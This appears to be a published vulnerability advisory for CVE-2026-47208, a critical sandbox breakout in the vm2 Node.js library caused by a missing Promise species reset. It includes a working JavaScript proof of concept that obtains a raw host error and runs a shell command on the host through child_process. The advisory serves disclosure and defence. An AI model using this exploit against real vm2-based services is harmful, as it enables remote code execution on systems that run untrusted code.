CVE-2026-47208

CRITICAL10.0

vm2 is Vulnerable to Sandbox Breakout Through Promise Species

Published: 5/29/2026Modified: 5/29/2026

Description

### Summary VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. ### Details The `localPromise` constructor was changed to call `this.then(undefined, eater)` to ensure a rejected promise is always used. However, this is missing a call to `resetPromiseSpecies` to ensure that `this` has no special species. Since the species can be changed a custom promise can be used to supply a custom reject method to the executor allowing to get a raw host error and escape the sandbox. ### PoC ```js const {VM} = require("vm2"); const vm = new VM(); vm.run(` class E extends Error {} function so(d) { if (d > 0) so(d-1); const e = new E(); e.stack; throw e; } let ex, ct; class FakePromise extends Promise { static get [Symbol.species](){return ct;} } function doCatch(f) { ex=undefined; const p=Promise.withResolvers(); ct = function(e){e(f, v=>{ex=v;p.resolve();})}; new FakePromise(r=>r()); return p.promise; } (async function f(s) { let min = s; let max = 100000; while (min<max) { const mid = (min+max)>>1; await doCatch(()=>so(mid)); if (ex.name==="RangeError" && !(ex instanceof RangeError)) { ex.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); return; } if (ex instanceof E) { min = mid+1; } else { max = mid; } } f(s+1); })(0); `); ``` ### Impact Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.

Affected packages (1)

CVSS scores

SourceVersionSeverityVector
osvCVSS 3.1CRITICAL10.0CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References (4)